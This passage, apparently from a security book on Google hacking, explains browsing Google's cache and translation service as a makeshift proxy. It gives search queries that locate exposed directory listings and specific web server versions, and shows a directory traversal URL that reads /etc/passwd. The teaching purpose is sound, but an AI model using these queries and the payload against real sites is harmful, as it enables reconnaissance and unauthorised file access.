Lines 1-3 show a standard TCP handshake on the Web port (port 80) between our browsing machine (192.168.2.32) and the Google server (64.233.167.104). Lines 4-9 show our Web data transfer as our browsing machine receives data from the Google server, and lines 10-12 show the normal successful shutdown of our communication with the Google server. Despite the fact that we loaded the same page as before, we communicated only with the Google server, not any external servers.
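The comparison made by eye above (which remote hosts did our browser actually talk to?) can be automated. What follows is a minimal Python sketch, not part of the original text: it assumes tcpdump -n style lines in which each endpoint is written as an IPv4 address followed by ".port", and the function names remote_hosts and unexpected_hosts are made up for this illustration.

```python
import re

# Matches the "src > dst" part of a tcpdump -n summary line, where each
# endpoint is an IPv4 address followed by ".port" (e.g. 192.168.2.32.51670).
ENDPOINT_PAIR = re.compile(
    r"IP (\d+\.\d+\.\d+\.\d+)\.(\d+) > (\d+\.\d+\.\d+\.\d+)\.(\d+)"
)


def remote_hosts(lines, local_ip):
    """Return the set of remote IPs that local_ip exchanged packets with."""
    remotes = set()
    for line in lines:
        match = ENDPOINT_PAIR.search(line)
        if not match:
            continue  # not an IPv4 packet summary; ignore it
        src_ip, _, dst_ip, _ = match.groups()
        if src_ip == local_ip:
            remotes.add(dst_ip)
        elif dst_ip == local_ip:
            remotes.add(src_ip)
    return remotes


def unexpected_hosts(lines, local_ip, expected):
    """Remote IPs present in the capture but absent from the expected set."""
    return remote_hosts(lines, local_ip) - set(expected)


# Three lines taken from the first capture in this section.
sample = [
    "21:39:24.719067 IP 64.233.167.104.80 > 192.168.2.32.51670",
    "21:39:24.731503 IP 192.168.2.32.51670 > 64.233.167.104.80",
    "21:39:24.897987 IP 192.168.2.32.51672 > 82.165.25.125.80",
]
print(unexpected_hosts(sample, "192.168.2.32", {"64.233.167.104"}))
```

Run against the full-page capture, a helper like this would flag 82.165.25.125; run against the text-only capture in Figure 3.4, it should report nothing beyond the Google server.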
If we were to look at the URL generated by clicking the "cached text only" link in the cached page's header, we would discover that Google appended an interesting parameter, &strip=1. This parameter forces a Google cache URL to display only cached text, avoiding any external references. This URL parameter only applies to URLs that reference a Google cached page.

Pulling it all together, we can browse a cached page with a fair amount of anonymity without a proxy server using a quick cut and paste and a URL modification. As an example, let's say that we used a Google query site:phrack.org inurl:hardcover, which returns one result. Instead of clicking the cached link, we will right-click the cached link and copy the URL to the Clipboard, as shown in Figure 3.5. Browsers handle this action differently, so use whichever technique works for you to capture the URL of this link.

Figure 3.5 Anonymous Cache Viewing Via Cut and Paste

Once the URL is copied to the Clipboard, paste it into the address bar of your browser, and append the &strip=1 parameter to the end of the URL. The URL should now look something like http://216.239.41.104/search?q=cache:ZTFntxDMrMIJ:www.phrack.org/hardcover62/++site:www.phrack.org+inurl:hardcover62&hl=en&strip=1. Press Enter after modifying the URL to load the page, and you should be taken to the stripped version of the cached page, which has a slightly different banner, as shown in Figure 3.6.

Figure 3.6 A Stripped Cached Page's Header

Notice that the stripped cache header reads differently than the standard cache header. Instead of the "This cached page may reference images which are no longer available" line is a new line that reads, "Click here for the full cached version with images included." This is an indicator that the current cached page has been stripped of external references. Unfortunately, the stripped page does not include graphics, so the page could look quite different from the original, and in some cases a stripped page might not be legible at all. If this is the case, it never hurts to load up a proxy server and hit the page, but real Google hackers "don't need no steenkin' proxy servers!"

Underground Googling...
Fun with Highlights

If you've ever scrolled through page after page of a document looking for a particular word or phrase, you probably already know that Google's cached version of the page will highlight search terms for you. What you might not realize is that you can use Google's highlight tool to highlight terms on a cached page that weren't included in your original search. This takes a bit of URL mangling, but it's fairly straightforward. For example, if you searched for peeps marshmallows and viewed the first cached page, the tail end of that URL would look something like www.marshmallowpeeps.com/news/press_peeps_spring_2004.html+peeps+marshmallows&hl=en. To highlight other terms, simply play around with the area after the target URL, in this case +peeps+marshmallows. Simply add or subtract words and press Enter, and Google will highlight the terms right in your browser!

Using Google as a Proxy Server

Although this technique might not work forever, at the time of this writing it's possible to use Google itself as a proxy server. This technique requires a Google-translated URL and some minor URL modification.

To make this work, we first need to generate a translation URL. The easiest way to do this is through Google's translation service, located at www.google.com/translate_t. If you were to enter a URL into the "Translate a web page" field, select a language pair, and click the Translate button, as shown in Figure 3.7, Google would translate the contents of the Web page and generate a translation URL that could be used for later reference.
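As an aside before the translation walkthrough, the two cache-URL edits covered so far (appending strip=1 and changing the highlighted terms) can be sketched in Python. This is an illustration under stated assumptions rather than anything from the original text: the helper names add_strip and set_highlight_terms are invented here, the code only rewrites strings and makes no network request, and EXAMPLEID in the usage lines is a placeholder because the text shows only the tail end of the marshmallow URL.

```python
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit


def _rebuild(parts, params):
    # Keep ":" and "/" literal so the cache reference stays readable;
    # spaces are written back as "+", matching the URLs shown in the text.
    return urlunsplit(parts._replace(query=urlencode(params, safe=":/")))


def add_strip(cache_url):
    """Return cache_url with strip=1 appended (replacing any old value)."""
    parts = urlsplit(cache_url)
    params = [
        (key, value)
        for key, value in parse_qsl(parts.query, keep_blank_values=True)
        if key != "strip"
    ]
    params.append(("strip", "1"))
    return _rebuild(parts, params)


def set_highlight_terms(cache_url, terms):
    """Replace the words that follow the cached target in the q parameter."""
    parts = urlsplit(cache_url)
    params = []
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key == "q" and value.startswith("cache:"):
            cache_ref = value.split(" ", 1)[0]  # "cache:<id>:<target URL>"
            value = " ".join([cache_ref, *terms])
        params.append((key, value))
    return _rebuild(parts, params)


phrack = ("http://216.239.41.104/search?q=cache:ZTFntxDMrMIJ:"
          "www.phrack.org/hardcover62/++site:www.phrack.org"
          "+inurl:hardcover62&hl=en")
print(add_strip(phrack))

# EXAMPLEID is a placeholder; the source shows only the end of this URL.
peeps = ("http://www.google.com/search?q=cache:EXAMPLEID:"
         "www.marshmallowpeeps.com/news/press_peeps_spring_2004.html"
         "+peeps+marshmallows&hl=en")
print(set_highlight_terms(peeps, ["peeps", "easter"]))
```

Parsing the query string instead of concatenating text avoids a doubled strip parameter if the function is applied twice to the same URL.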
Figure 3.7 Google's Translate Page is the Best Way to Generate a Translation URL

The URL generated from this page might look like this:

    http://www.google.com/translate?u=http%3A%2F%2Fwww.google.com&langpair=en%7Ces&hl=en&ie=Unknown&oe=ASCII

We discussed most of the parameters in this URL in Chapter 1, but we haven't talked about the langpair parameter yet. This parameter, which is only available for the translation service, describes which languages to translate to and from, respectively. The arguments to this parameter are identical to the hl parameters we saw in Chapter 1. Figure 3.7 shows that we were attempting to translate the www.google.com Web page from English to Spanish, which generated a langpair of en and es.

Here's where the hacker mentality kicks in. What would happen if we were to translate a page from one language into the same language? This would change our translation URL to:

    http://www.google.com/translate?u=http%3A%2F%2Fwww.google.com&langpair=en%7Cen&hl=en&ie=Unknown&oe=ASCII

If we loaded this URL into our browser, and if the source page were in English to begin with, we would see a page like the one shown in Figure 3.8.

Figure 3.8 Google Translating Itself from English to English?!
First, you should notice that the Google search page in the bottom frame of the browser window looks pretty familiar. In fact, it looks identical to the original search page. This is because no real language translation occurred. The top frame of the browser window shows the standard translation banner. Admittedly, all this work seems a bit anticlimactic, since all we have to show for our efforts is an exact copy of a page we could have just loaded directly. Fortunately, there is a payoff when we consider what happens behind the scenes. Let's look at another example, this time translating the www.phrack.org/hardcover62/ Web page, monitoring network traffic with tcpdump -n -U -t as shown in Figure 3.9.

Figure 3.9 Monitoring English to English Translation with Tcpdump -n -U -t

    IP 192.168.2.32.53466 > 64.233.171.104.80: S 1120160740:1120160740(0) win
    IP 64.233.171.104.80 > 192.168.2.32.53466: S 2337757854:2337757854(0) ack
    IP 192.168.2.32.53466 > 64.233.171.104.80: . ack 1
    IP 192.168.2.32.53466 > 64.233.171.104.80: P 1:678(677) ack
    IP 64.233.171.104.80 > 192.168.2.32.53466: . ack 678
    IP 64.233.171.104.80 > 192.168.2.32.53466: P 1:529(528) ack
    IP 192.168.2.32.53466 > 64.233.171.104.80: . ack 529
    IP 64.233.171.104.80 > 192.168.2.32.53466: P 529:549(20) ack
    IP 192.168.2.32.53466 > 64.233.171.104.80: P 678:1477(799) ack
    [snip]
    IP 192.168.2.32.53470 > 216.239.37.104.80: S 3691660195:3691660195(0) win
    IP 216.239.37.104.80 > 192.168.2.32.53470: S 2470826704:2470826704(0) ack
    IP 192.168.2.32.53470 > 216.239.37.104.80: . ack 1
    IP 192.168.2.32.53470 > 216.239.37.104.80: P 1:752(751) ack
    IP 216.239.37.104.80 > 192.168.2.32.53470: P 1:1271(1270) ack
    IP 216.239.37.104.80 > 192.168.2.32.53470: P 1271:1692(421) ack
    IP 216.239.37.104.80 > 192.168.2.32.53470: P 1692:1712(20) ack
    IP 192.168.2.32.53470 > 216.239.37.104.80: . ack 1712

In lines 1-3, we see our Web browsing machine (192.168.2.32) connecting to a Google Web server (64.233.171.104) on port 80. Data is transferred back and forth in lines 4-9, and another similar connection is established between the same addresses at line 10, removed for brevity. In lines 11-13, our Web browsing machine (192.168.2.32) connects to another Google Web server (216.239.37.104) on port 80. Data is transferred back and forth in lines 14-18, and the www.phrack.org/hardcover62/ Web page is displayed in our browser, as shown in Figure 3.10.

In this example, no data was transferred directly between our Web browsing machine and the phrack.org Web site! When we submitted our modified translation URL, Google fetched the Web page for us and passed the contents of the page back to our browser. Google, in essence, acted as a proxy server for our request.

Figure 3.10 Google Acting as a Transparent Proxy Server
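The translation URLs used in this section follow a fixed pattern, so they can be assembled programmatically. The Python sketch below is an illustration only: the function name translation_url is invented here, the parameter values (hl=en, ie=Unknown, oe=ASCII) are simply copied from the example URLs in the text, and the code builds a string without contacting Google or checking whether the service still accepts this form.

```python
from urllib.parse import urlencode


def translation_url(page_url, source_lang="en", target_lang="en"):
    """Build a translate URL; equal languages give the 'proxy' form."""
    params = {
        "u": page_url,
        # langpair is "from|to"; urlencode writes the "|" as %7C.
        "langpair": f"{source_lang}|{target_lang}",
        "hl": "en",
        "ie": "Unknown",
        "oe": "ASCII",
    }
    return "http://www.google.com/translate?" + urlencode(params)


# English to Spanish, as in Figure 3.7.
print(translation_url("http://www.google.com", "en", "es"))
# English to English, the same-language trick described above.
print(translation_url("http://www.phrack.org/hardcover62/"))
```

Defaulting both languages to en makes the same-language case the one-argument call, which is the only case the proxy trick needs.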
This is not a perfect proxy solution and should not be used as the sole proxy server in your toolkit. We present it simply as an example of what a little creative thinking can accomplish. While Google is acting as a proxy server, it is a transparent proxy server, which means the target Web site can still see our IP address in the connection logs, despite the fact that Google grabbed the page for us.

Underground Googling...
Test Your Proxy Server!

If you are conducting a test that requires you to protect your IP address from the target, use a proxy server and test it with a proxy checker like the one available from www.all-nettools.com/pr.htm. If you use this page to check the "Google proxy," you'll discover that it affords little protection for your IP address.

Directory Listings

A directory listing is a type of Web page that lists files and directories that exist on a Web server. Designed to be navigated by clicking directory links, directory listings typically have a title that describes the current directory, a list of files and directories that can be clicked, and often a footer that marks the bottom of the directory listing. Each of these elements is shown in the sample directory listing in Figure 3.11.
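The three elements just described (title, clickable entries with a parent link, and footer) are regular enough to check for mechanically. The following Python sketch is a rough heuristic, not a definitive detector: the function names are invented for this example, the sample HTML is hand-written rather than captured from a real server, and the footer pattern assumes the "... Server at host Port N" wording seen on Apache-style listings.

```python
import re

TITLE = re.compile(r"<title>(.*?)</title>", re.IGNORECASE | re.DOTALL)
# Assumed footer wording: "<server software> Server at <host> Port <number>".
FOOTER = re.compile(r"([^<>\n]*\bServer at \S+ Port \d+)", re.IGNORECASE)


def describe_listing(html):
    """Pull out the recognizable elements of a directory listing page."""
    title_match = TITLE.search(html)
    title = title_match.group(1).strip() if title_match else ""
    footer_match = FOOTER.search(html)
    return {
        "title": title,
        "has_index_title": title.lower().startswith("index of"),
        "has_parent_link": "parent directory" in html.lower(),
        "footer": footer_match.group(1).strip() if footer_match else None,
    }


def looks_like_listing(html):
    """True when both the title and the parent-directory link are present."""
    info = describe_listing(html)
    return info["has_index_title"] and info["has_parent_link"]


# Hand-written sample page; example.org is a placeholder host.
sample = """<html><head><title>Index of /security/dist</title></head>
<body><h1>Index of /security/dist</h1>
<a href="/security/">Parent Directory</a>
<a href="KEYS">KEYS</a>
<address>Apache/2.0 (Unix) Server at example.org Port 80</address>
</body></html>"""

print(looks_like_listing(sample))
print(describe_listing(sample)["footer"])
```

Requiring both the title and the parent link is a deliberate choice: a page that merely has "Index of" in its title is not enough to count as a listing.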
Figure 3.11 A Directory Listing Has Several Recognizable Elements

Much like an FTP server, directory listings offer a no-frills, easy-install solution for granting access to files that can be stored in categorized folders. Unfortunately, directory listings have many faults, specifically:

■ They are not secure in and of themselves. They do not prevent users from downloading certain files or accessing certain directories. This task is often left to the protection measures built into the Web server software or third-party scripts, modules, or programs designed specifically for that purpose.
■ They can display information that helps an attacker learn specific technical details about the Web server.
■ They do not discriminate between files that are meant to be public and those that are meant to remain behind the scenes.
■ They are often displayed accidentally since many Web servers display a directory listing if a top-level index file (index.htm, index.html, default.asp, and so on) is missing or invalid.

All this adds up to a deadly combination. In this section, we'll take a look at some of the ways Google hackers can take advantage of directory listings.

Locating Directory Listings

The most obvious way an attacker can abuse a directory listing is by simply finding it! Since directory listings offer "parent directory" links and allow browsing through files and folders, even the most basic attacker might soon discover that sensitive data can be found by simply locating the listings and browsing through them. Locating directory listings with Google is fairly straightforward.
Figure 3.11 shows that most directory listings begin with the phrase "Index of," which also shows in the title. An obvious query to find this type of page might be intitle:index.of, which would find pages with the term index of in the title of the document. Remember that the period (".") serves as a single-character wildcard in Google. Unfortunately, this query will return a large number of false positives, such as pages with the following titles:

    Index of Native American Resources on the Internet
    LibDex - Worldwide index of library catalogues
    Iowa State Entomology Index of Internet Resources

Judging from the titles of these documents, it is obvious that not only are these Web pages intentional, they are also not the type of directory listings we are looking for. As Ben Kenobi might say, "This is not the directory listing you're looking for." Several alternate queries provide more accurate results, for example, intitle:index.of "parent directory" (shown in Figure 3.12) or intitle:index.of name size. These queries indeed provide directory listings by not only focusing on index.of in the title but on keywords often found inside directory listings, such as parent directory, name, and size. Even judging from the summary on the search results page, you can see that these results are indeed the types of directory listings we're looking for.

Figure 3.12 A Good Search for Directory Listings
Finding Specific Directories

In some cases, it might be beneficial not only to look for directory listings but to look for directory listings that allow access to a specific directory. This is easily accomplished by adding the name of the directory to the search query. To locate "admin" directories that are accessible from directory listings, queries such as intitle:index.of.admin or intitle:index.of inurl:admin will work well, as shown in Figure 3.13.

Figure 3.13 Locating Specific Directories in a Directory Listing
Finding Specific Files

Because of the directory tree style, it is also possible to find specific files in a directory listing. For example, to find WS_FTP log files, try a search such as intitle:index.of ws_ftp.log, as shown in Figure 3.14. This technique can be extended to just about any kind of file by keying in on the index.of in the title and the filename in the text of the Web page.

Figure 3.14 Locating Files in a Directory Listing

You can also use filetype and inurl to search for specific files. To search again for ws_ftp.log files, try a query like filetype:log inurl:ws_ftp.log. This technique will generally find more results than the somewhat restrictive index.of search.
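The directory-listing queries in this section all share the same skeleton, which a few lines of Python can make explicit. This is a small sketch for illustration: the helper names listing_query and file_query are invented here, and the functions only assemble query strings to be pasted into a search box; they do not contact Google.

```python
def quote_phrase(term):
    """Wrap multi-word terms in double quotes so they search as a phrase."""
    return f'"{term}"' if " " in term else term


def listing_query(*page_terms, inurl=None):
    """Build an intitle:index.of query with optional inurl and page terms."""
    parts = ["intitle:index.of"]
    if inurl:
        parts.append(f"inurl:{inurl}")
    parts.extend(quote_phrase(term) for term in page_terms)
    return " ".join(parts)


def file_query(filename, extension):
    """Build the filetype/inurl alternative for locating a specific file."""
    return f"filetype:{extension} inurl:{filename}"


print(listing_query("parent directory"))
print(listing_query("name", "size"))
print(listing_query(inurl="admin"))
print(listing_query("ws_ftp.log"))
print(file_query("ws_ftp.log", "log"))
```

Each call reproduces one of the queries discussed above, which makes it easy to see that only the terms after intitle:index.of change from one search to the next.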
We'll be working more with specific file searches throughout the book.

Server Versioning

One piece of information an attacker can use to determine the best method for attacking a Web server is the exact software version. An attacker could retrieve that information by connecting directly to the Web port of that server and issuing a request for the HTTP (Web) headers. It is possible, however, to retrieve similar information from Google without ever connecting to the target server. One method involves using the information provided in a directory listing.

Figure 3.15 shows the bottom portion of a typical directory listing. Notice that some directory listings provide the name of the server software as well as the version number. An adept Web administrator could fake these server tags, but most often this information is legitimate and exactly the type of information an attacker will use to refine his attack against the server.

Figure 3.15 This Server Tag Can Be Used to Profile a Web Server

The Google query used to locate servers this way is simply an extension of the intitle:index.of query. The listing shown in Figure 3.15 was located with a query of intitle:index.of "server at". This query will locate all directory listings on the Web with index of in the title and server at anywhere in the text of the page. This might not seem like a very specific search, but the results are very clean and do not require further refinement.

Underground Googling...
Server Version? Who Cares?

Although server versioning might seem fairly harmless, realize that there are two ways an attacker might use this type of information.
If the attacker has already chosen his target and discovers this information on that target server, he could begin searching for an exploit (which might or might not exist) to use against that specific software version. Inversely, if the attacker already has a working exploit for a very specific version of Web server software, he could perform a Google search for targets that he can compromise with that exploit. An attacker, armed with an exploit and drawn to a potentially vulnerable server, is especially dangerous. Even small information leaks like this can have big payoffs for a clever attacker.

To search for a specific server version, the intitle:index.of query can be extended even further to something like intitle:index.of "Apache/1.3.27 Server at". This query would find pages like the one listed in Figure 3.15. As shown in Table 3.1, many different servers can be identified through a directory listing.

Table 3.1 Some Specific Servers Locatable Via Directory Listings

Directory Listing of Web Servers

    "AnWeb/1.42h" intitle:index.of
    "Apache Tomcat/" intitle:index.of
    "Apache-AdvancedExtranetServer/" intitle:index.of
    "Apache/df-exts" intitle:index.of
    "Apache/" "server at" intitle:index.of
    "Apache/AmEuro" intitle:index.of
    "Apache/Blast" intitle:index.of
    "Apache/WWW" intitle:index.of
    "Apache/df-exts" intitle:index.of
    "CERN httpd 3.0B (VAX VMS)" intitle:index.of
    "fitweb-wwws * server at" intitle:index.of
    "HP Apache-based Web Server/1.3.26" intitle:index.of
    "HP Apache-based Web Server/1.3.27 (Unix) mod_ssl/2.8.11 OpenSSL/0.9.6g" intitle:index.of
    "httpd+ssl/kttd" * server at intitle:index.of
    "JRun Web Server" intitle:index.of
    "MaXX/3.1" intitle:index.of
    "Microsoft-IIS/* server at" intitle:index.of
    "Microsoft-IIS/4.0" intitle:index.of
    "Microsoft-IIS/5.0 server at" intitle:index.of
    "Microsoft-IIS/6.0" intitle:index.of
    "OmniHTTPd/2.10" intitle:index.of
    "OpenSA/1.0.4" intitle:index.of
    "Oracle HTTP Server Powered by Apache" intitle:index.of
    "Red Hat Secure/2.0" intitle:index.of
    "Red Hat Secure/3.0 server at" intitle:index.of
    SEDWebserver * server +at intitle:index.of

Figure C.2 Directory Listings of Apache Versions

Queries That Locate Apache Versions Through Directory Listings

    "Apache/1.0" intitle:index.of
    "Apache/1.1" intitle:index.of
    "Apache/1.2" intitle:index.of
    "Apache/1.2.0 server at" intitle:index.of
    "Apache/1.2.4 server at" intitle:index.of
    "Apache/1.2.6 server at" intitle:index.of
    "Apache/1.3.0 server at" intitle:index.of
    "Apache/1.3.2 server at" intitle:index.of
    "Apache/1.3.1 server at" intitle:index.of
    "Apache/1.3.1.1 server at" intitle:index.of
    "Apache/1.3.3 server at" intitle:index.of
    "Apache/1.3.4 server at" intitle:index.of
    "Apache/1.3.6 server at" intitle:index.of
    "Apache/1.3.9 server at" intitle:index.of
    "Apache/1.3.11 server at" intitle:index.of
    "Apache/1.3.12 server at" intitle:index.of
    "Apache/1.3.14 server at" intitle:index.of
    "Apache/1.3.17 server at" intitle:index.of
    "Apache/1.3.19 server at" intitle:index.of
    "Apache/1.3.20 server at" intitle:index.of
    "Apache/1.3.22 server at" intitle:index.of
    "Apache/1.3.23 server at" intitle:index.of
    "Apache/1.3.24 server at" intitle:index.of
    "Apache/1.3.26 server at" intitle:index.of
    "Apache/1.3.27 server at" intitle:index.of
    "Apache/1.3.27-fil" intitle:index.of
    "Apache/1.3.28 server at" intitle:index.of
    "Apache/1.3.29 server at" intitle:index.of
    "Apache/1.3.31 server at" intitle:index.of
    "Apache/1.3.35 server at" intitle:index.of
    "Apache/2.0.32 server at" intitle:index.of
    "Apache/2.0.35 server at" intitle:index.of
    "Apache/2.0.36 server at" intitle:index.of
    "Apache/2.0.39 server at" intitle:index.of
    "Apache/2.0.40 server at" intitle:index.of
    "Apache/2.0.42 server at" intitle:index.of
    "Apache/2.0.43 server at" intitle:index.of
    "Apache/2.0.44 server at" intitle:index.of
    "Apache/2.0.45 server at" intitle:index.of
    "Apache/2.0.46 server at" intitle:index.of
    "Apache/2.0.47 server at" intitle:index.of
    "Apache/2.0.48 server at" intitle:index.of
    "Apache/2.0.49 server at" intitle:index.of
    "Apache/2.0.49a server at" intitle:index.of
    "Apache/2.0.50 server at" intitle:index.of
    "Apache/2.0.51 server at" intitle:index.of
    "Apache/2.0.52 server at" intitle:index.of

In addition to identifying the Web server version, it is also possible to determine the operating system of the server (as well as modules and other software that is installed). We'll look at more specific techniques to accomplish this later, but the server versioning technique we've just looked at can be extended by including more details in our query. Table 3.2 shows queries that located extremely esoteric server software combinations, revealed by server tags. These tags list a great deal of information about the servers they were found on and are shining examples proving that even a seemingly small information leak can sometimes explode out of control, revealing more information than expected.

Table 3.2 Locating Specific and Esoteric Server Versions

Queries That Locate Specific and Esoteric Server Versions

    "Apache/1.3.12 (Unix) mod_fastcgi/2.2.12 mod_dyntag/1.0 mod_advert/1.12 mod_czech/3.1.1b2" intitle:index.of
    "Apache/1.3.12 (Unix) mod_fastcgi/2.2.4 secured_by_Raven/1.5.0" intitle:index.of
    "Apache/1.3.12 (Unix) mod_ssl/2.6.6 OpenSSL/0.9.5a" intitle:index.of
    "Apache/1.3.12 Cobalt (Unix) Resin/2.0.5 StoreSense-Bridge/1.3 ApacheJServ/1.1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_auth_pam/1.0a FrontPage/4.0.4.3 mod_perl/1.24" intitle:index.of
    "Apache/1.3.14 - PHP4.02 - Iprotect 1.6 CWIE (Unix) mod_fastcgi/2.2.12 PHP/4.0.3pl1" intitle:index.of
    "Apache/1.3.14 Ben-SSL/1.41 (Unix) mod_throttle/2.11 mod_perl/1.24_01 PHP/4.0.3pl1 FrontPage/4.0.4.3 rus/PL30.0" intitle:index.of
    "Apache/1.3.20 (Win32)" intitle:index.of
    "Apache/1.3.20 Sun Cobalt (Unix) PHP/4.0.3pl1 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.25" intitle:index.of
    "Apache/1.3.20 Sun Cobalt (Unix) PHP/4.0.4 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_ssl/2.8.4 OpenSSL/0.9.6b mod_perl/1.25" intitle:index.of
    "Apache/1.3.20 Sun Cobalt (Unix) PHP/4.0.6 mod_ssl/2.8.4 OpenSSL/0.9.6 FrontPage/5.0.2.2510 mod_perl/1.26" intitle:index.of
    "Apache/1.3.20 Sun Cobalt (Unix) mod_ssl/2.8.4 OpenSSL/0.9.6b PHP/4.0.3pl1 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.25" intitle:index.of
    "Apache/1.3.20 Sun Cobalt (Unix) mod_ssl/2.8.4 OpenSSL/0.9.6b PHP/4.0.3pl1 mod_fastcgi/2.2.8 mod_auth_pam_external/0.1 mod_perl/1.25" intitle:index.of
    "Apache/1.3.20 Sun Cobalt (Unix) mod_ssl/2.8.4 OpenSSL/0.9.6b PHP/4.0.4 mod_auth_pam_external/0.1 mod_perl/1.25" intitle:index.of
    "Apache/1.3.20 Sun Cobalt (Unix) mod_ssl/2.8.4 OpenSSL/0.9.6b PHP/4.0.6 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.25" intitle:index.of
    "Apache/1.3.20 Sun Cobalt (Unix) mod_ssl/2.8.4 OpenSSL/0.9.6b mod_auth_pam_external/0.1 mod_perl/1.25" intitle:index.of
    "Apache/1.3.26 (Unix) Debian GNU/Linux PHP/4.1.2 mod_dtcl" intitle:index.of
    "Apache/1.3.26 (Unix) PHP/4.2.2" intitle:index.of
    "Apache/1.3.26 (Unix) mod_ssl/2.8.9 OpenSSL/0.9.6b" intitle:index.of
    "Apache/1.3.26 (Unix) mod_ssl/2.8.9 OpenSSL/0.9.7" intitle:index.of
    "Apache/1.3.26+PH" intitle:index.of
    "Apache/1.3.27 (Darwin)" intitle:index.of
    "Apache/1.3.27 (Unix) mod_log_bytes/1.2 mod_bwlimited/1.0 PHP/4.3.1 FrontPage/5.0.2.2510 mod_ssl/2.8.12 OpenSSL/0.9.6b" intitle:index.of
    "Apache/1.3.27 (Unix) mod_ssl/2.8.11 OpenSSL/0.9.6g FrontPage/5.0.2.2510 mod_gzip/1.3.26 PHP/4.1.2 mod_throttle/3.1.2" intitle:index.of

Going Out on a Limb: Traversal Techniques

The next technique we'll examine is known as traversal. Traversal in this context simply means to travel across. Attackers use traversal techniques to expand a small "foothold" into a larger compromise.

Directory Traversal

To illustrate how traversal might be helpful, consider a directory listing that was found with intitle:index.of inurl:"/admin/*", as shown in Figure 3.16.

Figure 3.16 Traversal Example Found with index.of

In this example, our query brings us to a relative URL of /bpa/acadunits/admin/envr/bowman. If you look closely at the URL, you'll notice an "admin" directory two directory levels above our current location. If we were to click the "parent directory" link, we would be taken up one directory, to the "envr" directory.
Clicking the "parent directory" link from the "envr" directory would take us to the "admin" directory, a potentially juicy directory. This is very basic directory traversal. We could explore each and every parent directory and each of the subdirectories, looking for juicy stuff. Alternatively, we could use a creative site search combined with an inurl search to locate a specific file or term inside a specific subdirectory, such as site:cl.uh.edu inurl:bpa/acadunits/admin ws_ftp.log, for example. We could also explore this directory structure by modifying the URL in the address bar.

Regardless of how we were to "walk" the directory tree, we would be traversing outside the Google search, wandering around on the target Web server. This is basic traversal, specifically directory traversal. Another simple example would be replacing the word admin in the URL with another likely directory name, such as student.

Another, more serious traversal technique could allow an attacker to take advantage of software flaws to traverse to directories outside the Web server directory tree. For example, if a Web server is installed in the /var/www directory, and public Web documents are placed in /var/www/htdocs, by default any user attaching to the Web server's top-level directory is really viewing files located in /var/www/htdocs. Under normal circumstances, the Web server will not allow Web users to view files above the /var/www/htdocs directory. Now, let's say a poorly coded third-party software product is installed on the server that accepts directory names as arguments. A normal URL used by this product might be www.somesadsite.org/badcode.pl?page=/index.html. This URL would instruct the badcode.pl program to "fetch" the file located at /var/www/htdocs/index.html and display it to the user, perhaps with a nifty header and footer attached.
An attacker might attempt to take advantage of this type of program by sending a URL such as www.somesadsite.org/badcode.pl?page=../../../etc/passwd. If the badcode.pl program is vulnerable to a directory traversal attack, it would break out of the /var/www/htdocs directory, crawl up to the real root directory of the server, dive down into the /etc directory, and "fetch" the system password file, displaying it to the user with a nifty header and footer attached!

Automated tools can do a much better job of locating these types of files and vulnerabilities, if you don't mind all the noise they create. If you're a programmer, you will be very interested in the Libwhisker Perl library, written and maintained by Rain Forest Puppy (RFP) and available from www.wiretrip.net/rfp. SecurityFocus wrote a great article on using Libwhisker. That article is available from www.securityfocus.com/infocus/1798. If you aren't a programmer, RFP's Whisker tool, also available from the Wiretrip site, is excellent, as are other tools based on Libwhisker, such as nikto, written by sullo@cirt.net, which is said to be updated even more often than the Whisker program itself.

Incremental Substitution

Another technique similar to traversal is incremental substitution. This technique involves replacing numbers in a URL in an attempt to find directories or files that are hidden, or unlinked from other pages. Remember that Google generally only locates files that are linked from other pages, so if it's not linked, Google won't find it. (Okay, there's an exception to every rule. See the FAQ at the end of this chapter.) As a simple example, consider a document called exhc-1.xls, found with Google. You could easily modify the URL for that document, changing the 1 to a 2, making the filename exhc-2.xls. If the document is found, you have successfully used the incremental substitution technique! In some cases it might be simpler to use a Google query to find other similar files on the site, but remember, not all files on the Web are in Google's databases. Use this technique only when you're sure a simple query modification won't find the files first.

This technique applies not only to filenames but to just about anything in a URL that contains a number, even parameters to scripts. Using this technique to toy with parameters to scripts is beyond the scope of this book, but if you're interested in trying your hand at some simple file or directory substitutions, scare up some test sites with queries such as filetype:xls inurl:1.xls or intitle:index.of inurl:0001 or even an images search for 1.jpg. Now use substitution to try to modify the numbers in the URL to locate other files or directories that exist on the site. Here are some examples:

■ /docs/bulletin/1.xls could be modified to /docs/bulletin/2.xls
■ /DigLib_thumbnail/spmg/hel/0001/H/ could be changed to /DigLib_thumbnail/spmg/hel/0002/H/
■ /gallery/wel008-1.jpg could be modified to /gallery/wel008-2.jpg

Extension Walking

We've already discussed file extensions and how the filetype operator can be used to locate files with specific file extensions. For example, we could easily search for HTM files with a query such as filetype:HTM HTM. (Remember that filetype searches require a search parameter. Files ending in HTM always have HTM in the URL!) Once you've located HTM files, you could apply the substitution technique to find files with the same filename and a different extension. For example, if you found /docs/index.htm, you could modify the URL to /docs/index.asp to try to locate an index.asp file in the docs directory. If this seems somewhat pointless, rest assured, this is, in fact, rather pointless. We can, however, make more intelligent substitutions. Consider the directory listing shown in Figure 3.17.
This listing shows evidence of a very common practice, the creation of backup copies of Web pages.

Figure 3.17 Backup Copies of Web Pages Are Very Common
[Screenshot: a directory listing, "Index of /english/", in which each .htm page (index.htm, index1.htm, index10.htm, index11.htm, index12.htm) sits beside a matching .htm.bak copy. Most files are dated January 2002; index.htm is dated 19-Jan-04.]

Backup files can be a very interesting find from a security perspective. In some cases, backup files are older versions of an original file. This is evidenced in Figure 3.17. Take a look at the date of the index.htm file. The date is listed as January 19, 2004. Now take a look at the backup copy, index.htm.bak. That file's date is listed as January 9, 2002. Without even viewing these files, we can tell that they are most likely very different, since there are more than two years' difference in the dates. Older files are not necessarily less secure than newer versions, but backup files on the Web have an interesting side effect: They have a tendency to reveal source code. Source code of a Web page is quite a find for a security practitioner because it can contain behind-the-scenes information about the author, the code creation and revision process, authentication information, and more.

